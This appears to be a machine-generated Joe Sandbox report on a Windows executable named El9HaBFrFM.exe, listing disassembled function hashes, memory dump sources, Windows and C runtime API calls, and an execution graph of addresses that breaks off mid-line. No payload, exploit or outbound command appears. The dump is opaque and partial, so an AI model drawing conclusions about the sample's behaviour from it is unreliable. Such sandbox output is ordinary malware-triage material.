                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5ab84bcfd6b32d117b449bbad918289ce3c76e6614392b6939ed3afa7ea1916f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61514922F08A418AFB50DF79D4503BD37A2AB48B98F549675EF4ADB689DF38D4818700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7679ec17063924541901481bf07df1987c0fea6410c096e0297fb8c568833bea
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9911C821F1C16682FE549BAEE9852BD5293EF88780F888071DF49C7BA9DD3DD8D58700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca5cb5ad417d3bb251627e950f2dad7a2e7761b76c1909dad9a2ef81bbb3bdd3
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA411622A087A246FB648B29E80137A6B61EF80BA4F144275EF5DC7AD6EF3CD4418700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B9046
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968
                                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6BA3ACBA5), ref: 00007FF6BA3B9064
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                        • API String ID: 3580290477-1581088161
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7e97badaa0ccaea44ec8ca81f79f4ba403a3b2c33def53094e1d1ff2d40dba6a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2417E72A08F1686EB14DF29A8900BD67A6EF847D0B9541B5EF4EC3B95DF3CE4818300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8b2636ecf5a37c6a28ec54cecb3cde6a02ebede1cd60dc86711ab11c39cbc8b5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C241C232B18B9581DB608F29E8443AA67A5FB98784F844135EF4DC7798EF3CD441CB40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: fcb5bf7002bc9c5c43ccbfa54844a0bbe3d333a9f6fcb63af7fcece02c784686
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E21F872A08A4181EB649B19D44427D73B2FB84B44F858279DF8DC3694DF7DD548C741
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 580b3386c56f74526aea9c4e6018cf4d7d0a842e23dddda4bd2515111dc8cf6b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B111C32618B9182EB618F19F840259B7E5FB88B88F584270DF8D87768EF3DD555C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 66112ebc79a8769491d7d8a4283cd90d670ab3743ab5ce09253566f55c7b284a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C901F22291C76386FB64AF68986127E23A0EF49744F800176DF4CC3681EF3CE440CB08

                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                        Execution Coverage:2.3%
                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                        Signature Coverage:1.1%
                                                                                                                                                                                                                                                                                                                        Total number of Nodes:935
                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:60
                                                                                                                                                                                                                                                                                                                        execution_graph 99636 7ffdfb145220 99637 7ffdfb1452ae 99636->99637 99639 7ffdfb145258 99636->99639 99638 7ffdfb1452d0 99637->99638 99637->99639 99640 7ffdfb145270 99638->99640 99646 7ffdfb1452d5 99638->99646 99672 7ffdfb0c9340 7 API calls 99639->99672 99673 7ffdfb0c9340 7 API calls 99640->99673 99643 7ffdfb14529a 99645 7ffdfb1453cd 99646->99645 99648 7ffdfb144c70 99646->99648 99674 7ffdfb12b040 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 99646->99674 99660 7ffdfb144ce4 99648->99660 99649 7ffdfb144f3b 99675 7ffdfb17fc80 99649->99675 99650 7ffdfb144e77 99650->99649 99651 7ffdfb144eaa 99650->99651 99654 7ffdfb144eb3 99651->99654 99655 7ffdfb144edb 99651->99655 99684 7ffdfb0ca370 10 API calls 99654->99684 99658 7ffdfb144ef4 00007FFE13343010 99655->99658 99665 7ffdfb144f14 99655->99665 99657 7ffdfb145207 99657->99646 99659 7ffdfb17fc80 7 API calls 99658->99659 99659->99665 99660->99650 99662 7ffdfb144d5f 99660->99662 99664 7ffdfb144e52 99660->99664 99661 7ffdfb144fba 99661->99662 99663 7ffdfb144fce 99661->99663 99685 7ffdfb0e3790 99661->99685 99692 7ffdfb121280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 99661->99692 99693 7ffdfb0e4b80 14 API calls 99661->99693 99695 7ffdfb1f2900 99662->99695 99663->99662 99694 7ffdfb0ca370 10 API calls 99663->99694 99683 7ffdfb0ca370 10 API calls 99664->99683 99665->99661 99668 7ffdfb144fa5 00007FFE13343010 99665->99668 99668->99661 99672->99640 99673->99643 99674->99646 99679 7ffdfb17fcd1 99675->99679 99676 7ffdfb1800f0 99703 7ffdfb0c9340 7 API calls 99676->99703 99679->99676 99682 7ffdfb18010d 99679->99682 99702 7ffdfb0c9170 7 API calls 99679->99702 99680 7ffdfb1f2900 4 API calls 99681 7ffdfb180250 99680->99681 99681->99665 99682->99680 99683->99662 99684->99662 99689 7ffdfb0e37c7 99685->99689 99686 7ffdfb0e3829 99686->99661 99689->99686 99691 7ffdfb0e39e5 99689->99691 99704 7ffdfb0e3370 99689->99704 99715 7ffdfb0d7270 11 API calls 99689->99715 99691->99686 99716 7ffdfb0db2b0 7 API calls new[] 99691->99716 99692->99661 99693->99661 99694->99662 99696 7ffdfb1f2909 99695->99696 99697 7ffdfb1f2914 99696->99697 99698 7ffdfb1f2954 IsProcessorFeaturePresent 99696->99698 99697->99657 99699 7ffdfb1f296c 99698->99699 99797 7ffdfb1f2b4c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 99699->99797 99701 7ffdfb1f297f 99701->99657 99702->99676 99703->99682 99717 7ffdfb0d9d00 99704->99717 99707 7ffdfb0e355d 99712 7ffdfb0e34a4 99707->99712 99750 7ffdfb0d7270 11 API calls 99707->99750 99708 7ffdfb0e33a2 99708->99707 99711 7ffdfb0e3493 99708->99711 99708->99712 99748 7ffdfb0db9d0 7 API calls 99708->99748 99711->99707 99711->99712 99749 7ffdfb185aa0 7 API calls 99711->99749 99712->99689 99715->99689 99716->99686 99718 7ffdfb0d9fb9 99717->99718 99723 7ffdfb0d9d30 99717->99723 99722 7ffdfb0d9dc1 99718->99722 99754 7ffdfb0dec50 10 API calls 99718->99754 99720 7ffdfb1f2900 4 API calls 99721 7ffdfb0da0b9 99720->99721 99721->99712 99729 7ffdfb0da0d0 99721->99729 99722->99720 99723->99718 99723->99722 99724 7ffdfb0d9ec5 99723->99724 99728 7ffdfb0d9e82 99723->99728 99751 7ffdfb185ae0 7 API calls 99723->99751 99724->99718 99724->99722 99753 7ffdfb0db9d0 7 API calls 99724->99753 99728->99722 99728->99724 99752 7ffdfb0d7c90 7 API calls 99728->99752 99730 7ffdfb0da125 99729->99730 99731 7ffdfb0da0f2 99729->99731 99755 7ffdfb0d50b0 99730->99755 99767 7ffdfb0c9340 7 API calls 99731->99767 99733 7ffdfb0da248 99768 7ffdfb0c9340 7 API calls 99733->99768 99734 7ffdfb0da2a0 99737 7ffdfb0da2ce 99734->99737 99739 7ffdfb0da2b8 99734->99739 99738 7ffdfb0da15d 99737->99738 99743 7ffdfb0da2ea 99737->99743 99741 7ffdfb0da11e 99738->99741 99769 7ffdfb0d7270 11 API calls 99738->99769 99761 7ffdfb0d8050 99739->99761 99740 7ffdfb0da144 99740->99733 99740->99734 99740->99738 99740->99741 99741->99708 99743->99741 99744 7ffdfb0da30d 99743->99744 99770 7ffdfb0d3380 7 API calls new[] 99743->99770 99771 7ffdfb0d6930 7 API calls new[] 99744->99771 99748->99711 99749->99707 99750->99712 99751->99728 99752->99724 99753->99718 99754->99722 99756 7ffdfb0d50ff 99755->99756 99759 7ffdfb0d5127 99756->99759 99760 7ffdfb0d513b 99756->99760 99776 7ffdfb0d49f0 7 API calls new[] 99756->99776 99759->99740 99760->99759 99772 7ffdfb0d4820 99760->99772 99762 7ffdfb0d808c 99761->99762 99763 7ffdfb0d807f 99761->99763 99765 7ffdfb0d809c 99762->99765 99786 7ffdfb0cd9e0 99762->99786 99795 7ffdfb0defb0 8 API calls 99763->99795 99765->99738 99767->99741 99768->99738 99769->99741 99770->99744 99771->99741 99773 7ffdfb0d4848 99772->99773 99774 7ffdfb0d48b6 99772->99774 99773->99774 99777 7ffdfb0c6180 99773->99777 99774->99759 99776->99760 99778 7ffdfb0c6199 99777->99778 99779 7ffdfb0c6240 99777->99779 99778->99779 99781 7ffdfb0c5b35 99778->99781 99779->99774 99782 7ffdfb0c5b46 99781->99782 99783 7ffdfb0c5b62 99782->99783 99785 7ffdfb0c9340 7 API calls 99782->99785 99783->99779 99785->99783 99787 7ffdfb0cda0d 99786->99787 99794 7ffdfb0cda5a 99786->99794 99788 7ffdfb0cda43 00007FFE13343010 99787->99788 99789 7ffdfb0cda23 00007FFE13343010 99787->99789 99788->99794 99793 7ffdfb0cda28 99789->99793 99790 7ffdfb0cda83 ReadFile 99791 7ffdfb0cdb19 99790->99791 99790->99794 99791->99793 99796 7ffdfb0c9340 7 API calls 99791->99796 99793->99765 99794->99790 99794->99791 99794->99793 99795->99762 99796->99793 99797->99701 99798 7ffdfab215a0 99799 7ffdfab215b8 99798->99799 99800 7ffdfab216c6 99799->99800 99802 7ffdfaab1c1c 99799->99802 99802->99799 99804 7ffdfaaf6e20 99802->99804 99805 7ffdfaaf6eec 99804->99805 99806 7ffdfaab1a0f 99804->99806 99805->99799 99806->99804 99809 7ffdfaafab70 99806->99809 99807 7ffdfaab14f1 SetLastError 99807->99809 99808 7ffdfaafb8b6 99810 7ffdfaafb8e1 00007FFE1FFB6570 99808->99810 99815 7ffdfaaface7 99808->99815 99809->99807 99809->99808 99809->99815 99811 7ffdfaafb906 00007FFE1FFB6570 99810->99811 99810->99815 99812 7ffdfaafb926 00007FFE1FFB6570 99811->99812 99811->99815 99813 7ffdfaafb93d 00007FFE1FFB6570 99812->99813 99812->99815 99814 7ffdfaafb957 00007FFE1FFB6570 99813->99814 99813->99815 99814->99815 99815->99804 99816 7ff6ba3a2fe0 99817 7ff6ba3a2ff0 99816->99817 99818 7ff6ba3a3041 99817->99818 99819 7ff6ba3a302b 99817->99819 99822 7ff6ba3a3061 99818->99822 99827 7ff6ba3a3077 __std_exception_destroy 99818->99827 99878 7ff6ba3a2710 54 API calls _log10_special 99819->99878 99821 7ff6ba3a3037 __std_exception_destroy 99880 7ff6ba3ac550 99821->99880 99879 7ff6ba3a2710 54 API calls _log10_special 99822->99879 99827->99821 99828 7ff6ba3a3349 99827->99828 99831 7ff6ba3a3333 99827->99831 99833 7ff6ba3a330d 99827->99833 99835 7ff6ba3a3207 99827->99835 99844 7ff6ba3a1470 99827->99844 99874 7ff6ba3a1c80 99827->99874 99895 7ff6ba3a2710 54 API calls _log10_special 99828->99895 99894 7ff6ba3a2710 54 API calls _log10_special 99831->99894 99893 7ff6ba3a2710 54 API calls _log10_special 99833->99893 99836 7ff6ba3a3273 99835->99836 99889 7ff6ba3ba404 37 API calls 2 library calls 99835->99889 99838 7ff6ba3a329e 99836->99838 99839 7ff6ba3a3290 99836->99839 99891 7ff6ba3a2dd0 37 API calls 99838->99891 99890 7ff6ba3ba404 37 API calls 2 library calls 99839->99890 99842 7ff6ba3a329c 99892 7ff6ba3a2500 54 API calls __std_exception_destroy 99842->99892 99896 7ff6ba3a45c0 99844->99896 99847 7ff6ba3a149b 99936 7ff6ba3a2710 54 API calls _log10_special 99847->99936 99848 7ff6ba3a14bc 99906 7ff6ba3b06d4 99848->99906 99851 7ff6ba3a14ab 99851->99827 99852 7ff6ba3a14d1 99853 7ff6ba3a14d5 99852->99853 99854 7ff6ba3a14f8 99852->99854 99937 7ff6ba3b4f08 11 API calls memcpy_s 99853->99937 99858 7ff6ba3a1532 99854->99858 99859 7ff6ba3a1508 99854->99859 99856 7ff6ba3a14da 99938 7ff6ba3a2910 54 API calls _log10_special 99856->99938 99860 7ff6ba3a1538 99858->99860 99861 7ff6ba3a154b 99858->99861 99939 7ff6ba3b4f08 11 API calls memcpy_s 99859->99939 99910 7ff6ba3a1210 99860->99910 99867 7ff6ba3a14f3 __std_exception_destroy 99861->99867 99870 7ff6ba3a15d6 99861->99870 99941 7ff6ba3b039c 99861->99941 99864 7ff6ba3a1510 99940 7ff6ba3a2910 54 API calls _log10_special 99864->99940 99932 7ff6ba3b004c 99867->99932 99868 7ff6ba3a15c4 99868->99827 99944 7ff6ba3b4f08 11 API calls memcpy_s 99870->99944 99872 7ff6ba3a15db 99945 7ff6ba3a2910 54 API calls _log10_special 99872->99945 99875 7ff6ba3a1ca5 99874->99875 100186 7ff6ba3b4984 99875->100186 99878->99821 99879->99821 99881 7ff6ba3ac559 99880->99881 99882 7ff6ba3ac8e0 IsProcessorFeaturePresent 99881->99882 99883 7ff6ba3a31fa 99881->99883 99884 7ff6ba3ac8f8 99882->99884 100209 7ff6ba3acad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 99884->100209 99886 7ff6ba3ac90b 100210 7ff6ba3ac8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99886->100210 99889->99836 99890->99842 99891->99842 99892->99821 99893->99821 99894->99821 99895->99821 99897 7ff6ba3a45cc 99896->99897 99946 7ff6ba3a9390 99897->99946 99899 7ff6ba3a45f4 99900 7ff6ba3a9390 2 API calls 99899->99900 99901 7ff6ba3a4607 99900->99901 99951 7ff6ba3b5f94 99901->99951 99904 7ff6ba3ac550 _log10_special 8 API calls 99905 7ff6ba3a1493 99904->99905 99905->99847 99905->99848 99907 7ff6ba3b0704 99906->99907 100119 7ff6ba3b0464 99907->100119 99909 7ff6ba3b071d 99909->99852 99911 7ff6ba3a1268 99910->99911 99912 7ff6ba3a126f 99911->99912 99913 7ff6ba3a1297 99911->99913 100136 7ff6ba3a2710 54 API calls _log10_special 99912->100136 99916 7ff6ba3a12b1 99913->99916 99917 7ff6ba3a12d4 99913->99917 99915 7ff6ba3a1282 99915->99867 100137 7ff6ba3b4f08 11 API calls memcpy_s 99916->100137 99920 7ff6ba3a12e6 99917->99920 99927 7ff6ba3a1309 memcpy_s 99917->99927 99919 7ff6ba3a12b6 100138 7ff6ba3a2910 54 API calls _log10_special 99919->100138 100139 7ff6ba3b4f08 11 API calls memcpy_s 99920->100139 99923 7ff6ba3a12eb 100140 7ff6ba3a2910 54 API calls _log10_special 99923->100140 99924 7ff6ba3b039c _fread_nolock 53 API calls 99924->99927 99926 7ff6ba3a12cf __std_exception_destroy 99926->99867 99927->99924 99927->99926 99930 7ff6ba3a13cf 99927->99930 99931 7ff6ba3b0110 37 API calls 99927->99931 100132 7ff6ba3b0adc 99927->100132 100141 7ff6ba3a2710 54 API calls _log10_special 99930->100141 99931->99927 99933 7ff6ba3b007c 99932->99933 100158 7ff6ba3afe28 99933->100158 99935 7ff6ba3b0095 99935->99868 99936->99851 99937->99856 99938->99867 99939->99864 99940->99867 100170 7ff6ba3b03bc 99941->100170 99944->99872 99945->99867 99947 7ff6ba3a93b2 MultiByteToWideChar 99946->99947 99949 7ff6ba3a93d6 99946->99949 99947->99949 99950 7ff6ba3a93ec __std_exception_destroy 99947->99950 99948 7ff6ba3a93f3 MultiByteToWideChar 99948->99950 99949->99948 99949->99950 99950->99899 99952 7ff6ba3b5ec8 99951->99952 99953 7ff6ba3b5eee 99952->99953 99955 7ff6ba3b5f21 99952->99955 99982 7ff6ba3b4f08 11 API calls memcpy_s 99953->99982 99958 7ff6ba3b5f34 99955->99958 99959 7ff6ba3b5f27 99955->99959 99956 7ff6ba3b5ef3 99983 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 99956->99983 99970 7ff6ba3bac28 99958->99970 99984 